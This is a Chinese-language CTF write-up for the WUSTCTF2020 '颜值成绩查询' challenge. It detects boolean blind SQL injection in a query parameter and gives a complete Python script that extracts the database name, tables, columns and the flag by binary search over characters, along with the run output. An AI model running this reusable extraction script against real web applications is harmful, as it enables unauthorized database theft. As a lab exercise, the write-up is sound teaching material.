[WUSTCTF2020]颜值成绩查询

[WUSTCTF2020]颜值成绩查询

打开网页，发现输入框可以查询，考虑sql注入。先输入：

if(length(database()) > 1, 1, 0)

发现可以查到数据，但输入：

if(length(database()) > 3, 1, 0)

却查不到数据，所以可以确定是布尔注入。可以flag一位位爆破出来。脚本：

import requests

vision_str = '''!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~'''
Original_url = "http://26d6f65d-9a43-404c-bd19-01f916f30201.node4.buuoj.cn:81/?stunum="
Success_message = "Hi"

def database_name():
    name = ''
    for i in range(1, 10): #数据库名的第i位
        begin = 32
        end = 126
        mid = (begin + end) // 2 #取整除，返回商的整数部分（向下取整）
        while begin < end:
            url = Original_url + "if(ascii(substr(database(), %d, 1)) > %d, 1, 0)" % (i, mid)
            RowText = requests.get(url, timeout=100)
            if Success_message in RowText.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if (mid == 32):
            print()
            break
        name += chr(mid)
        print("\r数据库名: " + name, end="")
    return name

def table_name():
    name = ''
    table_list = []
    for j in range(1, 100): # 数据库表名的第j位
        begin = 32
        end = 126
        mid = (begin + end) // 2 #取整除，返回商的整数部分（向下取整）
        while begin < end:
            url = Original_url + 'if((select/**/ascii(substr(group_concat(table_name),%d,1))/**/from/**/information_schema.tables/**/where/**/table_schema=database())>%d,1,0)' %(j, mid)
            RowText = requests.get(url, timeout=100)
            if Success_message in RowText.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if (mid == 32):
            print()
            break
        name += chr(mid)
        print("\r表名: " + name, end="")
    table_list = name.split(",")
    for table_name in table_list:
        column_name(table_name)

def column_name(table_name):
    name = ''
    column_list = []
    for j in range(1, 100): # 字段名的第j位
        begin = 32
        end = 126
        mid = (begin + end) // 2 #取整除，返回商的整数部分（向下取整）
        while begin < end:
            url = Original_url + 'if((select/**/ascii(substr(group_concat(column_name),%d,1))/**/from/**/information_schema.columns/**/where/**/table_name="%s"/**/and/**/table_schema=database()) > %d, 1, 0)' %(j, table_name, mid)
            RowText = requests.get(url, timeout=100)
            if Success_message in RowText.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if (mid == 32):
            print()
            break
        name += chr(mid)
        print(("\r表%s的字段名: " + name) % table_name, end="")
    column_list = name.split(",")
    for column_name in column_list:
        GetData(table_name, column_name)

def GetData(table_name, column_name):
    data = ''
    for i in range(1, 100): #数据的第i位
        begin = 32
        end = 126
        mid = (begin + end) // 2 #取整除，返回商的整数部分（向下取整）
        while begin < end:
            url = Original_url + 'if(ascii(substr((select/**/%s/**/from/**/%s),%d,1)) > %d,1, -1)' %(column_name, table_name, i, mid)
            RowText = requests.get(url, timeout=100)
            if Success_message in RowText.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if (mid == 32):
            print()
            break
        data += chr(mid)
        print(("\r表%s的字段%s数据: " + data) % (table_name, column_name), end="")

database_name()
table_name()

运行结果：

数据库名: ctf
表名: flag,score
表flag的字段名: flag,value
表flag的字段flag数据: flag
表flag的字段value数据: flag{1f57fe04-406e-4037-b313-2dba09c240b7}
表score的字段名: id,name,score

利用二分法提高速度。

References

BUUCTF：[WUSTCTF2020]颜值成绩查询_末初 · mochu7-CSDN博客

布尔型盲注Python脚本_末初 · mochu7-CSDN博客_布尔盲注python脚本

SQL布尔盲注 – 【WUST-CTF2020】颜值成绩查询_Ve99tr’s Blog-CSDN博客